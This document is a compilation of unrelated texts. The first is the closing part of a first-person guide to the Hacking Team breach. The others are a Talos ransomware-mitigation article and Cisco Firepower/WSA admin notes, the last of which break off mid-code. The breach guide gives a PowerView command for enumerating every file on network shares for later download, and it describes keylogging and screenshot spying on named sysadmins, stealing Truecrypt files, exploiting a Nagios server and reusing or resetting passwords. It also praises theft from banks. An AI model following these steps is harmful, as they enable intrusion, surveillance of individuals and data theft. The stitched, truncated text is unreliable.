   The command is part of windows, but if you don't have a GUI you can use
   powershell [8].

[1] https://www.indetectables.net/viewtopic.php?p=211165
[2] https://adsecurity.org/?page_id=1821
[3] https://github.com/bidord/pykek
[4] https://adsecurity.org/?p=676
[5] http://www.hackplayers.com/2014/12/CVE-2014-6324-como-validarse-con-cualquier-usuario-como-admin.html
[6] https://github.com/n1nj4sec/pupy
[7] http://www.powershellempire.com/?page_id=273
[8] https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Invoke-Runas.ps1


----[ 13.2 - Persistence ]------------------------------------------------------

Once you have access, you want to keep it. Really, persistence is only a
challenge for assholes like Hacking Team who target activists and other
individuals. To hack companies, persistence isn't needed since companies never
sleep. I always use Duqu 2 style "persistence", executing in RAM on a couple
high-uptime servers. On the off chance that they all reboot at the same time,
I have passwords and a golden ticket [1] as backup access. You can read more
about the different techniques for persistence in windows here [2][3][4]. But
for hacking companies, it's not needed and it increases the risk of detection.

[1] http://blog.cobaltstrike.com/2014/05/14/meterpreter-kiwi-extension-golden-ticket-howto/
[2] http://www.harmj0y.net/blog/empire/nothing-lasts-forever-persistence-with-empire/
[3] http://www.hexacorn.com/blog/category/autostart-persistence/
[4] https://blog.netspi.com/tag/persistence/


----[ 13.3 - Internal reconnaissance ]------------------------------------------

The best tool these days for understanding windows networks is Powerview [1].
It's worth reading everything written by its author [2], especially [3], [4],
[5], and [6]. Powershell itself is also quite powerful [7]. As there are still
many windows 2000 and 2003 servers without powershell, you also have to learn
the old school [8], with programs like netview.exe [9] or the windows builtin
"net view". Other techniques that I like are:

1) Downloading a list of file names

   With a Domain Admin account, you can download a list of all filenames in
   the network with powerview:

   Invoke-ShareFinderThreaded -ExcludedShares IPC$,PRINT$,ADMIN$ |
   select-string '^(.*) \t-' | %{dir -recurse $_.Matches[0].Groups[1] |
   select fullname | out-file -append files.txt}

   Later, you can read it at your leisure and choose which files to download.

2) Reading email

   As we've already seen, you can download email with powershell, and it has a
   lot of useful information.

3) Reading sharepoint

   It's another place where many businesses store a lot of important
   information. It can also be downloaded with powershell [10].

4) Active Directory [11]

   It has a lot of useful information about users and computers. Without being
   Domain Admin, you can already get a lot of info with powerview and other
   tools [12]. After getting Domain Admin, you should export all the AD
   information with csvde or another tool.

5) Spy on the employees

   One of my favorite hobbies is hunting sysadmins. Spying on Christian Pozzi
   (one of Hacking Team's sysadmins) gave me access to a Nagios server which
   gave me access to the rete sviluppo (development network with the source
   code of RCS). With a simple combination of Get-Keystrokes and
   Get-TimedScreenshot from PowerSploit [13], Do-Exfiltration from nishang
   [14], and GPO, you can spy on any employee, or even on the whole domain.

[1] https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerView
[2] http://www.harmj0y.net/blog/tag/powerview/
[3] http://www.harmj0y.net/blog/powershell/veil-powerview-a-usage-guide/
[4] http://www.harmj0y.net/blog/redteaming/powerview-2-0/
[5] http://www.harmj0y.net/blog/penetesting/i-hunt-sysadmins/
[6] http://www.slideshare.net/harmj0y/i-have-the-powerview
[7] https://adsecurity.org/?p=2535
[8] https://www.youtube.com/watch?v=rpwrKhgMd7E
[9] https://github.com/mubix/netview
[10] https://blogs.msdn.microsoft.com/rcormier/2013/03/30/how-to-perform-bulk-downloads-of-files-in-sharepoint/
[11] https://adsecurity.org/?page_id=41
[12] http://www.darkoperator.com/?tag=Active+Directory
[13] https://github.com/PowerShellMafia/PowerSploit
[14] https://github.com/samratashok/nishang


--[ 14 - Hunting Sysadmins ]----------------------------------------------------

Reading their documentation about their infrastructure [1], I saw that I was
still missing access to something important - the "Rete Sviluppo", an isolated
network with the source code for RCS. The sysadmins of a company always have
access to everything, so I searched the computers of Mauro Romeo and Christian
Pozzi to see how they administer the Sviluppo network, and to see if there
were any other interesting systems I should investigate. It was simple to
access their computers, since they were part of the windows domain where I'd
already gotten admin access. Mauro Romeo's computer didn't have any ports
open, so I opened the port for WMI [2] and executed meterpreter [3]. In
addition to keylogging and screen scraping with Get-Keystrokes and
Get-TimedScreenshot, I used many /gather/ modules from metasploit, CredMan.ps1
[4], and searched for interesting files [5]. Upon seeing that Pozzi had a
Truecrypt volume, I waited until he'd mounted it and then copied off the
files. Many have made fun of Christian Pozzi's weak passwords (and of
Christian Pozzi in general, he provides plenty of material [6][7][8][9]). I
included them in the leak as a false clue, and to laugh at him. The reality is
that mimikatz and keyloggers view all passwords equally.

[1] http://hacking.technology/Hacked%20Team/FileServer/FileServer/Hackingteam/InfrastrutturaIT/
[2] http://www.hammer-software.com/wmigphowto.shtml
[3] https://www.trustedsec.com/june-2015/no_psexec_needed/
[4] https://gallery.technet.microsoft.com/scriptcenter/PowerShell-Credentials-d44c3cde
[5] http://pwnwiki.io/#!presence/windows/find_files.md
[6] http://archive.is/TbaPy
[7] http://hacking.technology/Hacked%20Team/c.pozzi/screenshots/
[8] http://hacking.technology/Hacked%20Team/c.pozzi/Desktop/you.txt
[9] http://hacking.technology/Hacked%20Team/c.pozzi/credentials/


--[ 15 - The bridge ]-----------------------------------------------------------

Within Christian Pozzi's Truecrypt volume, there was a textfile with many
passwords [1]. One of those was for a Fully Automated Nagios server, which had
access to the Sviluppo network in order to monitor it. I'd found the bridge I
needed. The textfile just had the password to the web interface, but there was
a public code execution exploit [2] (it's an unauthenticated exploit, but it
requires that at least one user has a session initiated, for which I used the
password from the textfile).

[1] http://hacking.technology/Hacked%20Team/c.pozzi/Truecrypt%20Volume/Login%20HT.txt
[2] http://seclists.org/fulldisclosure/2014/Oct/78


--[ 16 - Reusing and resetting passwords ]--------------------------------------

Reading the emails, I'd seen Daniele Milan granting access to git repos. I
already had his windows password thanks to mimikatz. I tried it on the git
server and it worked. Then I tried sudo and it worked. For the gitlab server
and their twitter account, I used the "forgot my password" function along with
my access to their mail server to reset the passwords.


--[ 17 - Conclusion ]-----------------------------------------------------------

That's all it takes to take down a company and stop their human rights abuses.
That's the beauty and asymmetry of hacking: with 100 hours of work, one person
can undo years of work by a multi-million dollar company. Hacking gives the
underdog a chance to fight and win.

Hacking guides often end with a disclaimer: this information is for
educational purposes only, be an ethical hacker, don't attack systems you
don't have permission to, etc. I'll say the same, but with a more rebellious
conception of "ethical" hacking. Leaking documents, expropriating money from
banks, and working to secure the computers of ordinary people is ethical
hacking. However, most people that call themselves "ethical hackers" just work
to secure those who pay their high consulting fees, who are often those most
deserving to be hacked.

Hacking Team saw themselves as part of a long line of inspired Italian design
[1]. I see Vincenzetti, his company, his cronies in the police, Carabinieri,
and government, as part of a long tradition of Italian fascism. I'd like to
dedicate this guide to the victims of the raid on the Armando Diaz school, and
to all those who have had their blood spilled by Italian fascists.

[1] https://twitter.com/coracurrier/status/618104723263090688


--[ 18 - Contact ]--------------------------------------------------------------

To send me spear phishing attempts, death threats in Italian [1][2], and to
give me 0days or access inside banks, corporations, governments, etc.

[1] http://andres.delgado.ec/2016/01/15/el-miedo-de-vigilar-a-los-vigilantes/
[2] https://twitter.com/CthulhuSec/status/619459002854977537

only encrypted email please:
https://securityinabox.org/es/thunderbird_usarenigmail



                      If not you, who? If not now, when?
                _   _            _      ____             _    _ 
               | | | | __ _  ___| | __ | __ )  __ _  ___| | _| |
               | |_| |/ _` |/ __| |/ / |  _ \ / _` |/ __| |/ / |
               |  _  | (_| | (__|   <  | |_) | (_| | (__|   <|_|
               |_| |_|\__,_|\___|_|\_\ |____/ \__,_|\___|_|\_(_)

mitigating ransomware

From http://blog.talosintel.com/2016/04/ransomware.html#more

Preventing Initial Access


There are things that can be done to prevent the attack before it even starts. If the attackers cannot establish initial access in the target network easily, this increases the likelihood that they will seek easier prey elsewhere. Our attackers are opportunistic and are looking to turn a profit with as little effort as possible. Initial access usually comes in one of two forms: exploitation of public-facing services, or phishing/social engineering.

DMZ Hardening tips


DMZ hardening amounts to a couple of key housekeeping and maintenance tasks:
  • Periodic port scans: Port scans can be utilized to map one's DMZ and gain a better view of the actual services and operating systems an organization is exposing to the internet. Once you have a collection of exposed services, you can map the public addresses to private addresses, determine who owns the asset(s) and/or whether or not exposure of the service(s) is even necessary. The lower the number of services exposed to the public internet, the lower the attack surface available.
  • Vulnerability scans/remediation: Once publicly exposed services have been verified, utilize vulnerability scanners against the exposed services. Remediate findings as soon as possible.
  • Regular system maintenance:
    • Find and follow system hardening guidelines, such as DISA's STIG[41].
    • Ensure that regular patch maintenance is being performed.
    • Ensure that DMZ system logs are being exported to a log collector/SIEM.
    • Any publicly exposed systems/services that require authentication should require strong passwords; consider implementing two-factor authentication (where possible) instead.
    • Any publicly exposed systems/services that require authentication should have rate limiting, or blocking based on the number of failed guesses, to limit the success of brute force attacks.

Mitigating Phishing/Social Engineering


While preventing initial access through phishing or social engineering is much more difficult, there are actions that can be taken to mitigate the risks:
  • Consider investing in a company-sanctioned file-sharing program for exchanging files between users in the organization and/or company partners. Utilizing a file-sharing solution, and instructing users to never share or accept files over email can almost completely mitigate phishing attacks utilizing attachments. Instruct your users that the mail server isn't for file exchange, nor is it meant for archiving files.
  • Inform users that do not have to regularly work with macro-enabled Office documents to never enable macros. In fact, since the majority of your userbase has no requirement to work with macros, disable Office macros through Group Policy, enabling them only for business units with a specific need[42]. For those business units that cannot operate without Office macros, consider digitally signed macros to further mitigate that risk.
  • Some phishing attacks are delivered through PDFs and will specifically target vulnerabilities in certain PDF reader applications (e.g. Adobe Reader) to achieve code execution. Consider using an alternative PDF reader and disabling extra functionality (e.g. javascript in PDF).
  • Ensure the email scanning gateways disallow sending and receiving executable files (exe, dll, cpl, scr), JavaScript (.js files) and Office documents with macros, and scan .zip files for their contents.
  • Enforce checking/verifying SPF records to mitigate spoofed e-mails.
  • Ensure that you have a mail gateway solution that is updated with information on the latest phishing domains (e.g. senderbase, etc.)
  • More often than not, the new gTLDs, as well as dynamic DNS domains, are heavily abused in malware campaigns due to how inexpensive they are to acquire. In most cases, they can be blacklisted with little to nothing to worry about; they tend to have a very low business relevance. Blacklist dynamic DNS and new gTLDs by default, and whitelist individual domains as required, only if there is a specific business need.
  • Instruct users to trust but verify, especially for any messages from outside the company with attachments. Simply asking the sender "Did you send this?" over the phone prior to opening the attachment is all it takes.
  • If users are in any way concerned that they have been phished, instruct them to report the incident. The users shouldn't fear your SOC or security department and should NOT be punished for reporting security incidents.
  • Notify users that IT and/or Security will never ask them for their passwords to reduce the effectiveness of phishing attacks that are attempting to gather user credentials.
  • Disallow the mounting of USB drives. This mitigates the "print my resume for me" scenario as well as mitigating self-propagating malware that attempts to jump air gaps through compromised USB drives. If removable media cannot be disabled across the enterprise, at a minimum disable autorun for removable media via GPO, and instruct employees to never accept or use thumb drives from untrusted sources. Instruct users that all thumb drives should be scanned for viruses upon insertion and before users access the files; consider configuring antivirus to perform automatic on-access scans for any USB drives plugged into systems. If utilizing thumb drives in a sensitive airgapped environment is required, consider keeping a collection of thumb drives, tagging them as company assets and signing them out on each use.
  • Ensure that guests are signed in at reception, signed out, and always shadowed. Guests should have an escort with them at all times.
  • Tailgating, the practice of unauthorized individuals following authorized individuals into a restricted area, can be a big problem. Most people have a tendency to avoid confrontation, so this makes enforcing anti-tailgating policies a little more difficult, especially when challenging individuals who appear to "have their hands full". This can be mitigated by writing into security policy a requirement that employee badges must be present and visible at all times. Additionally, all authorized guests, vendors, etc. should be required to adhere to this policy, badge in at all gates, and be escorted/shadowed by an employee at all times.

Impeding Lateral Movement and Propagation


If attackers make it through your initial defenses, your goal is to make it as hard as you can for them to move laterally inside your network. Through careful architecture and password management you can make lateral movement much more difficult.
  • Network segmentation is a massive part of impeding lateral movement and containing threats easily. The majority of corporate networks are "flat" with little to no segmentation between business units, between users and data, between data specific to business units, etc. The reason you don't typically see network segmentation in large organizations is that it requires coordination and planning on a massive scale. Most networks grow as the need for capacity arises, with little to no thought on segmentation. Business acquisitions are usually focused on how to integrate additional assets quickly as opposed to securely. All of that aside however, the benefits of properly segmented networks cannot be denied. Segmentation can be used to stop and/or slow lateral movement, as well as contain threats. There are multiple components for segmented networks, and this should NOT be considered an exhaustive list, but consider implementing the following:
    • VLAN and subnet segmentation: Each business unit should have its own VLANs and subnets for logically separating access to data. Segmentation should NOT stop at the business unit, however. User workstations need to be segmented from the servers/services required for that business unit, as well as services that are used across business units (e.g. messaging, file sharing, e-mail, etc.) This list of VLANs and subnets should be meticulously maintained and available for both IT and Security staff. If you do not have this information by default, or are looking to try and figure out how to logically separate users, servers and business units, consider looking for DHCP scope configurations and using them as a rule of thumb for subnet and VLAN segmentation.
    • Dedicated firewall/gateway segmentation: firewalls are another important part of network segmentation and an often overlooked portion of internal network design. Understand which business units have a requirement to communicate directly with one another, and which ones do not. Understand which services and ports are required for that inter-business unit communication. Do ingress as well as egress filtering (doing this requires understanding the direction in which data flows for services). Firewall policy should be reviewed regularly. IT and Security staff should have access to the firewall policies and should be included in policy review decisions.
    • Host-based firewalls with ingress/egress filtering configured. Again, ingress and egress. Hosts should not be able to communicate via SMB (139/tcp, 445/tcp) with one another. If file server(s) are set up, there should effectively be no need for this. If you can effectively disable host-to-host SMB communication, you prevent the attackers from being able to use "pass the hash" for lateral movement. SMB communication should be limited to application distribution platforms, file shares, and/or Domain Controllers.
  • Application Blocking/Whitelisting: Application whitelisting is a built-in feature for windows that can be implemented via software restriction policies[43]. However, not unlike network segmentation it takes a significant amount of time to implement and test, especially if different business units have different application needs. As a stopgap measure, it may be easier to try and block executables that attempt to run from specific locations, such as %TEMP% or %APPDATA% directories on windows systems, making exceptions for certain applications only as necessary[44]. Not unlike network segmentation, whitelisting is a significant time investment, but it is a tremendous boon for containing and preventing initial access AND lateral movement.
  • Role-Based network share permissions (Least Privilege): File shares tend to get incredibly complex between multiple business units, folder permissions and share permissions for the network. Application of least privilege for file shares prevents the compromise of a single user resulting in the loss of most of the data on the network file share in the event of ransomware, as well as preventing compromised accounts being used to access data from different business units; if password security is poor, a compromised user account may be used by attackers to gather credentials stored on file shares with access the user should not have.
  • Proper credential management: Users should be trained to utilize a password manager along with strong passwords for storing network credentials. Train users to NOT re-use

Recovery


Backup recovery is your last line of defense against having to pay out a ransom to the attackers; it's your last bastion in the event that the worst has happened. Your ability to recover from this attack with minimal data loss and/or service interruption comes down to whether or not the system backups and/or disaster recovery sites were compromised as part of the attacker methodology. Whether or not your backups were compromised depends on how well your backup systems, network and/or recovery sites were segmented from your main network. Even in the event your organization does not utilize on-site backups at all, instead opting for cloud backup solutions (e.g. Amazon Glacier), if those cloud backup credentials are left in easily accessible locations, or if passwords are reused, our hypothetical adversary could easily delete all backup instances, resulting in 100% data loss if there is no other backup solution in place. The secure, off-site, enterprise backup solution could easily be defeated through password reuse and/or poor password management.

For enterprises utilizing backup solutions, there are a wide variety of backup methodologies; the SANS reading room has a comprehensive document on tape rotation schemes that is incredibly helpful for reviewing different tape backup schemes[45]. Typically, as part of a tape rotation policy, a portion of those tapes are delivered to an off-site storage facility. This is for disaster recovery purposes; if there is a catastrophic failure at the site hosting an organization's data, the tapes at the storage facility are still there to recover from at a backup facility. In a scenario in which local backups are deleted, removed, or otherwise made inaccessible by the attackers, off-site backups are often your only hope of restoring service without paying the ransom. How often your backups are sent off-site determines how much data (if any) would be inaccessible or lost.

Conclusion


The past few years have seen a dramatic uptick in ransomware variants and their deployment on a global scale. Cyber criminals see an easy opportunity for profit. It is inevitable that these adversaries would look to the past for effective malware behaviors to advance the efficacy of ransomware. Combined with new methodologies in targeting, we anticipate a trend towards ransomware that can self-propagate and move semi-autonomously throughout a network to devastating effect.

To emphasize this, one need look no further than SamSam.exe, the malware sample recovered from a number of scattered enterprise network breaches mainly targeting the healthcare vertical. SamSam isn't complex, and it is not fully self-sufficient, but it does exhibit some of the behaviors of a successful worm: rapid propagation, payload delivery (ransomware), and crippling recovery efforts. The age of self-propagating ransomware, or "cryptoworms", is right around the corner.

For too long, critical security controls and best practices for enterprise network security have been publicly praised and privately ignored. Drop-in appliances and security solutions can only do so much to protect the network, and will do little to stop this threat if networks continue to be architected and expanded without defense in depth in mind. If enterprises don't start making strides towards defensible architecture today, massive ransoms may end up getting paid tomorrow.

Monday, 18 April 2016

Cisco Firepower Notes


Base IPS policies let you avoid tuning the IPS yourself
Security over connectivity

Before = Access policies
During = IPS inspection
After = IOC/correlation

Create Banned applications rule

Allow file sharing
Inspection tap
Sec over connectivity
Malware policy ELH Files Policy


ISE attributes
Can be used to block iPads iPhones etc access to critical hosts

Upgrading the RAM in a Cisco ASA

1 - Backup config
2 - Take picture of cables
3 - Label cables
4 - power off ASA and un-cable
5 - Unscrew and open case
6 - Install the new DIMM
7 - re-cable and power on
8 - confirm upgrade with sh ver | i RAM

Wednesday, 23 March 2016

Device SW Versions lower than '5.4.0' currenly are not supported for DC at '6.0.1' cisco firepower

When attempting to register a sensor with the management VM I got this error:

Device SW Versions lower than '5.4.0' currenly are not supported for DC at '6.0.1'

Need to upgrade the software on the sensor

Wednesday, 17 February 2016

Cisco WSA ironport

Why use it

HTTP/HTTPS proxy
FTP proxy
Caching engine (delivers pages faster)
URL filtering with built in categories and dynamic filtering (block facebook etc)
Antimalware
Uses web reputation to block malware
Signature based malware engines
L4 traffic monitoring, sort of like IPS
You want all traffic to go through the WSA
Use the FW to restrict internet access so that only the WSA can reach the internet.
SPAN port on the internet-facing port: if there is any web traffic not sourced from the WSA, it can send a TCP reset
Web security is layer 7
The web is not a safe place so the WSA can help protect you.
Be aware some of the features overlap with the ASA so don't pay for same thing twice.

Unit types

S170 (physical unit, lowest end unit)
1 rack unit
1 dual core 2.8 GHz
4GB mem
500GB HD (2x250GB SATA RAID 1)
Hot swappable HDs
5 Ethernet ports and a console port

S000V (the virtual appliance)
S100V (more powerful etc)
S300V

Ports
M1 can be dedicated for management and proxy
P1 and P2 can only be used for proxy
T1 and T2 are for L4TM similar to IPS

Licensing

You must have a physical unit licensed first then you can download the virtual appliance
Take the serial for the device and apply for software bundle license for free
loadlicense xml file. You need to ftp the xml file onto the device. You can also paste into CLI.

Alternatively apply for 45 day demo license
Demo licenses can be acquired through the Cisco licensing page:
https://tools.cisco.com/SWIFT/LicensingUI/demoPage
Choose demo or evaluation licenses

IronPort was acquired by Cisco; there is still some IronPort tech and terminology
Licenses give you access to "blades" or modules with features in them
Most licenses will last for 1 year when activated.

You can split your license between two virtual boxes to be used in HA. A 500 seat license becomes two 250 seat licenses. You'll need to get the serials and log a call with Cisco; even they seem to be confused about it. I had to send serial and MAC addresses to them. They ask for the VLN, which can be found in show license, but if the license is expired or it's a fresh install you won't have a VLN yet; you need Cisco to resolve that.

You can fulfill the PAK on your primary machine and use the share function in our Licensing Registration Portal for your secondary virtual machine. You will get 2 license files each for your Virtual Machines.

I had to select physical machine. Added first VLN. Add device, added second VLN, then selected virtual and next, and it sent me two files. Applied the files with the loadlicense command.

If FTP is enabled you can use windows explorer to browse to ftp://x.x.x.x/configuration and drag and drop the lic file there. Then use loadlic from the CLI of the WSA. When reinstalling you can just apply the same lic file again.

Licenses may show as "Dormant" until you enable Web and/or https proxy.

AsyncOS

Based on FreeBSD
Optimized for low latency
Caching is used to optimize disk IO
No shell access
No tuning of the OS
Need Cisco TAC to do password recovery

Web proxy
All connection can from the
Anti-virus
Url filter
Policy management
All in the same box

Some of the features overlap with the ASA

Layer4 traffic monitoring 

Scans outbound traffic at wire speed and can disrupt sessions
Active session and passive blocking

M1 management interface

How to get traffic
WCCP method (transparent proxy mode)
User -> Switch -> WSA -> internet
internet -> WSA -> switch -> User
The user doesn't know they have been proxied

Proxy server method
User -> WSA -> internet
internet -> WSA -> user
The user's browser is configured to use a proxy server; we can enforce the proxy settings with Group Policy
Restrict access to install other applications like firefox etc

We can also use a PAC file: when the client gets an address from DHCP it pulls in the PAC file and gets the proxy settings. This can be hard to get working with all browsers etc.

Admin interfaces

http://wsa-m1:8080
https://wsa-m1:8443
You can change these

default username/password
admin/ironport

CLI
SSH TCP 22
History up and down arrow
Tab completion
? for list of commands
default IP address 192.168.42.42

CLI Commands

version - version and license information 
authcache <- see list of authenticated users (can flush them)
grep > 1 (accesslog) > DENIED or domain.com or DOMAIN\\username
nslookup
ping
telnet
interfaceconfig (setup IP addresses on interfaces)
setgateway (set default gw)
sethostname (set the hostname)
etherconfig (quick way to see the MAC addresses)
etherconfig ( you can use to setup sub interfaces / trunk interface, can only be done in CLI)
etherconfig > VLAN > NEW > 100 > P1 -> commit
Restart proxy services - diagnostic -> proxy -> kick (users will lose connection for 5 secs)
shutdown - shutdown the ironport if you need to make a change in vmware
commit (after making changes always do commit to save)
status detail - see CPU and RAM usage

Searching the logs
Top Auth failed sources (bypass if needed)
grep -i 'No such user' authlog.current | awk '{s[$15]++;} END { for(i in s) print s[i], i }' | sort -n -k 1 | tail -n 30 | sort -n -r

grep -i 'No such user' authlog.@20180314T162255.s | awk '{s[$15]++;} END { for(i in s) print s[i], i }' | sort -n -k 1 | tail -n 30 | sort -n -r

Auth failed destination (bypass if needed)
grep 'TCP_DENIED/407 ' aclog.current | awk '{print $7}' | awk -F / '{print $3}' | awk '{a[$1]++} END {for (o in a) printf "%s %s\n", o, a[o]}' | sort -k2 -gr | head -n12

grep '/401 ' aclog.current | awk '{print $7}' | awk -F / '{print $3}' | awk '{a[$1]++} END {for (o in a) printf "%s %s\n", o, a[o]}' | sort -k2 -gr | head -n12

Check for high counts of particular result codes; in this case 503 DNS errors are high
awk '{a[$4]++} END {for (o in a) printf "%s %s\n", o, a[o]}' aclog.current | sort -k2 -gr | head -n30

NONE/503 8910946  <<<
TCP_MISS/200 5994669
TCP_CLIENT_REFRESH_MISS/200 1911343
TCP_DENIED/407 1714271
TCP_MISS/401 234946
TCP_REFRESH_HIT/200 135614


Top failed DNS destinations (check DNS server and config local DNS entries)
grep 'NONE/503 ' aclog.current | awk '{print $7}' | awk -F / '{print $3}' | awk '{a[$1]++} END {for (o in a) printf "%s %s\n", o, a[o]}' | sort -k2 -gr | head -n12
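Below is an added example, not from these notes: a small POSIX shell script that does the same triage as the one-liners above (result-code counts, and top destinations for a given code) over constructed sample log lines. It goes slightly beyond the one-liners by also handling CONNECT entries, where the URL field is just host:port with no scheme. The log lines, hosts and IPs are made up.

```shell
#!/bin/sh
# Added example, not from the original notes: triage a WSA access log in the
# squid-cache format that the grep/awk one-liners above search. The field
# positions follow those one-liners: $4 is the result code (e.g. TCP_MISS/200)
# and $7 is the requested URL. Unlike the one-liners, this also handles
# CONNECT (HTTPS) entries, where $7 is "host:443" with no scheme or path.

# Constructed sample lines (not real WSA output): timestamp, elapsed ms,
# client IP, result code, bytes, method, URL, user, upstream, content type.
SAMPLE_ACLOG=$(cat <<'EOF'
1520000001.101 45 10.1.2.3 TCP_MISS/200 1234 GET http://www.example.com/index.html - DIRECT/www.example.com text/html
1520000002.102 12 10.1.2.3 NONE/503 0 GET http://typo.internal.lab/ - NONE/- -
1520000003.103 8 10.1.2.4 NONE/503 0 GET http://typo.internal.lab/app - NONE/- -
1520000004.104 30 10.1.2.5 TCP_DENIED/407 0 CONNECT updates.vendor.example:443 - NONE/- -
1520000005.105 22 10.1.2.5 TCP_DENIED/407 0 GET http://updates.vendor.example/manifest - NONE/- -
1520000006.106 15 10.1.2.6 TCP_HIT/200 987 GET http://www.example.com/logo.png - NONE/- image/png
1520000007.107 9 10.1.2.7 NONE/503 0 GET http://old-intranet.lab/ - NONE/- -
EOF
)

# Count each result code (field 4) over stdin: prints "count code", most
# frequent first. A spike in NONE/503 points at DNS, TCP_DENIED/407 at auth.
result_code_counts() {
    awk '{ c[$4]++ } END { for (k in c) print c[k], k }' | sort -k1,1nr -k2
}

# Print the destination host of each line on stdin, whatever form the URL
# field takes: "http://host/path", "https://host:443/x" or "host:443".
url_host() {
    awk '{
        u = $7
        sub("^[A-Za-z][A-Za-z0-9+.-]*://", "", u)   # drop any scheme://
        sub("[/:].*$", "", u)                       # drop :port and /path
        print u
    }'
}

# Top destinations for one result code, e.g. NONE/503 or TCP_DENIED/407:
# prints "count host", most frequent first, at most 12 lines.
top_hosts_for_code() {
    awk -v code="$1" '$4 == code' | url_host \
        | awk '{ c[$1]++ } END { for (k in c) print c[k], k }' \
        | sort -k1,1nr -k2 | head -n 12
}

# Stand-alone run over the constructed sample.
printf '%s\n' "$SAMPLE_ACLOG" | result_code_counts
echo "--- top NONE/503 (DNS failure) destinations ---"
printf '%s\n' "$SAMPLE_ACLOG" | top_hosts_for_code NONE/503
echo "--- top TCP_DENIED/407 (proxy auth) destinations ---"
printf '%s\n' "$SAMPLE_ACLOG" | top_hosts_for_code TCP_DENIED/407
```

Against a real log, feed the file in with `top_hosts_for_code NONE/503 < aclog.current` in place of the printf pipeline.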


Initial config

default IP address https://192.168.42.42:8443
default u: admin p: ironport
Accept eula
Hostname.domain.local
DNS servers
NTP server
Set time region
Network context page
Do you have another appliance somewhere in the network
Put the WSA closest to the clients downstream of the other proxy
Just click next if you don't have another proxy

DNS names are important in the WSA so make sure
wsa.domain.com resolves.
You can make a host entry if needed
on the CLI dnsconfig -> localhosts (hidden command)

Interfaces
Tick box to use M1 for management only *** (Important)
Ticking that box gives you a separate set of routes for the management interface, which is useful.
P1 = data interface
Default GW

You can also have
M1 (inside) management only
P1 INSIDE
P2 DMZ
Set default route for DMZ

Transparent settings
Layer 4 Switch or No Device

Set admin password
Set email alerts
Untick boxes for anonymous statistics

Security settings
Most of the default settings are fine; the security settings are enabled

Review page of all settings

The changes pending button appears in the top right
Changes you make need to be committed, this button appears after making changes

Activate licenses

Commit changes button

When you make changes in the web interface you'll see the commit changes button turn yellow in the top right. You need to click this to save your changes. In the CLI run the commit command.

Reports

You can get it to run a report on a schedule and email it to you
Remember you need to commit changes.
If you don't commit nothing will happen

Policy Trace

System administration -> Policy trace
You can put in a URL and a source IP (like a packet trace on ASA)
You have to fill in the username and IP or I've seen inconsistent results
Fill in url, auth, ip address, username
Lots of advanced values you can fill in
If a websites web reputation is good the wsa won't block it
It takes a little while to complete wait for final result

Deploying proxy services

We have two options for proxy deployment
Transparent mode
Explicit forward (clients are pointed at the proxy server IP)

Logging

There isn't much space built in for logging so we need to configure a syslog server
In the CLI type grep (you can choose to tail later with this command)
Logs are in the squid-cache format
TCP_MISS means it wasn't cached by the WSA
TCP_HIT means it came from the cache
List of HTTP status codes
http://www.tcpipguide.com/free/t_HTTPStatusCodeFormatStatusCodesandReasonPhrases-3.htm
Cisco also offers AWSR (advanced web security reporting tool) which is basically splunk. It has its own license. Syslog server will probably do the job.

Custom block page


Security Services > End-User Notification -> Edit settings
https://www.cisco.com/c/en/us/td/docs/security/wsa/wsa11-0/user_guide/b_WSA_UserGuide/b_WSA_UserGuide_chapter_010100.html

The PAC file

The pac file is just a javascript file. PAC stands for proxy autoconfig. We drop the pac file on a webserver somewhere. You can also host it on the WSA. Can be easier to just deploy proxy settings with group policy.

// Send every request through the WSA on port 80. "DIRECT" is the fallback the
// browser uses if the proxy is unreachable, so the firewall should still only
// allow the WSA itself out to the internet.
function FindProxyForURL (url,host)
{
return "PROXY wsa.lab.local:80; DIRECT";
}

Sec services -> pac file hosting
remember port is 9001
Choose the file and upload
commit changes

In browser (you can use a GPO to push this out to the clients)
Autoconfig url
wsa.lab.local:9001/pac.txt

One method to ensure user must use the WSA is to only allow the WSA internet access on your firewall.

Management roles

Administrator - Full rights
Operator - Can make some changes but can't do some tasks like upgrades etc
Read only Operator - Can only read information
Read only Guest - Can only read system status 

Policies

We can create groups of users, sites etc. and build access policies from them.
There is a global policy for everything with nothing blocked.
You can choose to block IM clients, youtube, p2p, social media etc
You may have to enable https inspection to fully block these applications.
Identities - Policies based on who you are. It identifies the user being proxied.
There are many policies you can combine them to get what you want.

Acceptable Use controls
Enable dynamic content analysis engine (blocks site that appear to be gambling etc but don't have a web reputation score yet)

Logging
You can ftp into the WSA
You can ftp or scp the file off
You can configure a syslog server
Splunk is advised for managing the log files

You can create some simple categories ALLOWED and BLOCKED.
On their own they don't do anything; you need to add these to the access policy
You can configure a custom time range.
Don't forget to commit changes

We can have an identity for the users. So marketing users are allowed access to facebook but accounts users are not.

Network -> Authentication 
Add realm
Make sure your time matches on the IP and the DCs
Add NTLM if you are using Active Directory; you could use LDAP instead
Add the DC ip addresses
Enter IPs of domain controller 192.168.1.10 (incase DNS goes down)
Fill in your domain lab.local
When Joining the domain (creating the computer account) don't use DOMAIN\administrator just use administrator
Test realm settings.
Don't forget to commit changes

You can setup the WSA to require authentication. You can set exceptions for things like windows and adobe updates. You can even allow an exception for guest users that they get a different level of web access without authentication

authcache
list shows you the authenticated users

Web proxy

Headers
x-forwarded-for
If you have upstream proxies you may need to change this for authentication to work correctly
Can proxy FTP, HTTPS etc. if you have the license

WSA http processing 

Rule processing order:
Check if the URL is in a custom category (allow/deny)
Check the rules for the built in URL categories
If it isn't matched by the above, the WSA checks the uncategorised URL rules
Web reputation score
Anti malware scanning
Application visibility and control (facebook allowed but apps denied)

Matching URLs
www.google.com = only www.google.com exactly is matched
.google.com = all subdomains are matched.
You can use regular expressions too.
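A small model of the rule processing order and the URL matching forms above, added here as an illustration and not WSA code: the custom categories, built-in category table, reputation threshold and the "re:" prefix for regex patterns are all constructed, and a leading-dot pattern is assumed to match the bare domain as well as its subdomains.

```python
"""Simplified model of WSA HTTP processing: custom category -> built-in
category -> uncategorised rule, then a web reputation check.
Illustration only; all tables and thresholds below are constructed."""
import re
from urllib.parse import urlparse

# Constructed custom categories. Bare hostname = exact match,
# leading dot = domain and all subdomains, "re:" prefix = regular expression.
CUSTOM_CATEGORIES = {
    "ALLOWED": ["www.intranet.example", ".lab.local"],
    "BLOCKED": [".badsite.example", r"re:^casino\d+\.example$"],
}
CUSTOM_ACTIONS = {"ALLOWED": "allow", "BLOCKED": "block"}

# Constructed built-in category lookup and per-category actions.
BUILTIN_CATEGORIES = {
    "www.google.com": "Search Engines",
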